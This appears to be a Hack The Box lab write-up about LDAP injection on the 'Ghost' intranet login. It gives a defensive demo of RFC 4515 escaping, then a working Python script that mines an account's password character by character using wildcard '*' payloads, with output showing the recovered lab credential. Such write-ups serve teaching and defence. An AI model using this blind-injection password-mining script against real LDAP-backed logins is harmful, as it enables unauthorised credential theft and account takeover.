Vulnerability


Reviewing the LDAP injection technique used to bypass authentication, the asterisk (*) appears to function as a wildcard. Since the backend does not have any input validation in place, this vulnerability can be further leveraged to mine the passwords of every domain account.
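To make the mechanism concrete from the defender's side, here is an added example (not code from the writeup, and not the intranet's real backend, whose filter the writeup never shows) that builds the login filter both ways, raw concatenation and RFC 4515 escaping, and evaluates each against a stored attribute with a toy matcher. The attribute names `sAMAccountName` and `userPassword`, the username `alice` and the stored secret `Hunter2-demo` are assumptions constructed for the demo.

```python
#!/usr/bin/env python3
"""Added example: why an unescaped '*' turns a password check into a
prefix probe, and how RFC 4515 escaping closes it. Attribute names and
the stored secret are assumptions; the writeup does not show the real
backend filter."""
import re

# RFC 4515 section 3: characters with special meaning inside an
# assertion value must be hex-escaped, otherwise they are filter syntax.
_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def ldap_escape(value: str) -> str:
    """Escape a user-supplied string for use as an LDAP assertion value."""
    return "".join(_ESCAPES.get(c, c) for c in value)


def build_filter_vulnerable(username: str, secret: str) -> str:
    """Raw concatenation: any '*' in `secret` is parsed as a wildcard."""
    return f"(&(sAMAccountName={username})(userPassword={secret}))"


def build_filter_hardened(username: str, secret: str) -> str:
    """Every user-controlled character is escaped, so '*' stays literal."""
    return (f"(&(sAMAccountName={ldap_escape(username)})"
            f"(userPassword={ldap_escape(secret)}))")


def assertion_matches(assertion: str, stored: str) -> bool:
    """Toy evaluator for one assertion value against one stored attribute.

    Implements just enough of RFC 4515: an unescaped '*' matches any run
    of characters, and a '\\xx' hex escape decodes to a literal character.
    """
    parts, buf, i = [], "", 0
    while i < len(assertion):
        c = assertion[i]
        if c == "\\" and re.fullmatch(r"[0-9a-fA-F]{2}", assertion[i + 1:i + 3]):
            buf += chr(int(assertion[i + 1:i + 3], 16))  # escaped literal
            i += 3
        elif c == "*":
            parts.append(buf)  # wildcard boundary
            buf = ""
            i += 1
        else:
            buf += c
            i += 1
    parts.append(buf)
    pattern = ".*".join(re.escape(p) for p in parts)
    return re.fullmatch(pattern, stored, re.DOTALL) is not None


def simulate_bind(stored_secret: str, supplied_secret: str, hardened: bool) -> bool:
    """Model the backend's login check: build the userPassword assertion
    with or without escaping and evaluate it against the stored value."""
    value = ldap_escape(supplied_secret) if hardened else supplied_secret
    return assertion_matches(value, stored_secret)


if __name__ == "__main__":
    STORED = "Hunter2-demo"  # constructed stored secret, not a lab value
    for guess in ["H*", "Hunter2-demo", "*"]:
        print(f"{guess!r:16} vulnerable={simulate_bind(STORED, guess, False)} "
              f"hardened={simulate_bind(STORED, guess, True)}")
    print(build_filter_vulnerable("alice", "H*"))
    print(build_filter_hardened("alice", "H*"))
```

With the raw builder, a supplied secret of `H*` (or just `*`) matches the stored value and the login succeeds, which is exactly the signal the character-by-character mining relies on; with escaping, `*` becomes `\2a` and only the exact secret matches. In a real deployment the escaping should come from the LDAP library (python-ldap's `ldap.filter.escape_filter_chars`, for instance) rather than a hand-rolled table, and better still the application should verify the password by binding as the user instead of comparing it inside a search filter, so there is no assertion value for an attacker to shape.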

Exploit


#!/usr/bin/python3

import requests
import string

url = 'http://intranet.ghost.htb:8008/login'

# Next-Action identifies the Next.js server action that handles the login form
headers = {
    'Host': 'intranet.ghost.htb:8008',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',
    'Connection': 'keep-alive'
}

ldap_username = input("Enter the LDAP username: ")

passw = ""
while True:
    # Try every candidate for the next position; the trailing '*' lets the
    # LDAP filter match any remainder, so a 303 means the prefix is correct
    for char in string.ascii_lowercase + string.digits:
        files = {
            '1_ldap-username': (None, ldap_username),
            '1_ldap-secret': (None, f'{passw}{char}*'),
            '0': (None, '[{},"$K1"]')
        }
        res = requests.post(url, headers=headers, files=files)
        if res.status_code == 303:
            passw += char
            print(f"Passwd: {passw}")
            break
    else:
        # No candidate matched: the password has no further characters
        break
print(f"Final password: {passw}")

A simple Python script that, for each position, iterates through the lowercase ASCII letters and digits, each followed by the asterisk (*)

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ python3 password_mining.py
Enter the LDAP username: gitea_temp_principal
Passwd: s
Passwd: sz
Passwd: szr
Passwd: szrr
Passwd: szrr8
Passwd: szrr8k
Passwd: szrr8kp
Passwd: szrr8kpc
Passwd: szrr8kpc3
Passwd: szrr8kpc3z
Passwd: szrr8kpc3z6
Passwd: szrr8kpc3z6o
Passwd: szrr8kpc3z6on
Passwd: szrr8kpc3z6onl
Passwd: szrr8kpc3z6onlq
Passwd: szrr8kpc3z6onlqf
Final password: szrr8kpc3z6onlqf

gitea_temp_principal:szrr8kpc3z6onlqf